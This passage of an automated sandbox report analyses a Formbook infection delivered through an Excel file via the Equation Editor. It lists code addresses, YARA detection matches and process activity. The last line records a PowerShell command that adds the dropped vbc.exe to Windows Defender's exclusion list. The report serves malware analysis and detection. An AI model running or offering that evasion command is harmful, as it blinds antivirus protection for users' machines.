          Source: C:\Users\Public\vbc.exeCode function: 13_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00409E40
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C7E0C6
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C83040
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C9905A
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CAD005
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C7E2E9
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D21238
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C7F3CF
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CA63DB
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D263BF
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C87353
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CCA37B
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C82305
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C91489
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CB5485
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CBD47D
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C9C5F0
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CC6540
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C8351F
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C8E6C1
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C84680
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D22622
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CCA634
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CB57C3
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D0579A
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C8C7BC
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D1F8EE
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C8C85C
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CA286D
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C969FE
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D2098E
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C829B2
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D05955
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D33A83
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D0DBDA
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C7FBD7
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D2CBA4
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CA7B00
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D1FDDD
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C8CD5B
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CB0D3B
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C9EE4C
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CB2E2F
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00D1CFB1
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00CADF7C
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C90F3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_02061238
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FBE0C6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0200A37B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FD905A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_020663BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC3040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FED005
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FE63DB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FBF3CF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC7353
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC2305
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FBE2E9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FDC5F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_02062622
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0200A634
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC351F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FD1489
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FF5485
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FFD47D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0204579A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FF57C3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FCC7BC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FCE6C1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_02006540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC4680
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FD69FE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC29B2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_02073A83
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FE286D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FCC85C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0206CBA4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0204DBDA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FBFBD7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0205F8EE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FE7B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_02045955
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0206098E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FCCD5B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FF0D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0205CFB1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FEDF7C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FD0F3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FDEE4C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FF2E2F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_0205FDDD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DE1A2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000C2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000C9E40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000C2FB0
          Source: Refno.191938.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 00C7E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00CEF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00CC3F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00CC373B appears 244 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00C7DF5C appears 119 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 01FBE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0200373B appears 244 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 02003F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0202F970 appears 84 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 01FBDF5C appears 119 times
          Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ohms[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: zFVxYeAVOjnwuB.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@17/10@3/2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_005CACEE AdjustTokenPrivileges,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_005CACB7 AdjustTokenPrivileges,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0211ACEE AdjustTokenPrivileges,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0211ACB7 AdjustTokenPrivileges,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_020DACEE AdjustTokenPrivileges,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_020DACB7 AdjustTokenPrivileges,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Refno.191938.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCE56.tmpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......8...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................`.......;.......................0......./.......8...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................`.......q.......................0.......;...............|.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................`...............................0.......;.......8...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......8.......".......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................`.......8.......................0.......G.......8...............H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................w.......................0.......S...............~.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................p...............................0.......S.......8...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................p...............................0......._.......................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................p...............................0......._.......8...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......k.......8.......2.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................p.......*.......................0.......k.......8...............H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................p.......R.......................0.......w...............l.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............................p.......................0.......w.......8...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................0...............8...............H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............8...............H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................D...............................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................D...............................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................D...............................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................D...............................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................D...............................0.......;...............|.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................D.......*.......................0.......;.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......R.......................0.......G...............".......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................D.......m.......................0.......G.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................D...............................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................D...............................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......O.j.n.w.u.B...e.x.e.............D...............................0......._.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................D...............................0......._.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................D.......$.......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................B.......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................&.......................0...............................................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................X.......(.P...............................................................................................(.....
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................5.......................0.......;.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7......._.......................0.......G...............".......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............................~.......................0.......G.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......O.j.n.w.u.B...e.x.e.............................................0......._.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................9.......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................V.......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................;.......................0...............................................
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Refno.191938.xlsxVirustotal: Detection: 30%
          Source: Refno.191938.xlsxReversingLabs: Detection: 23%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
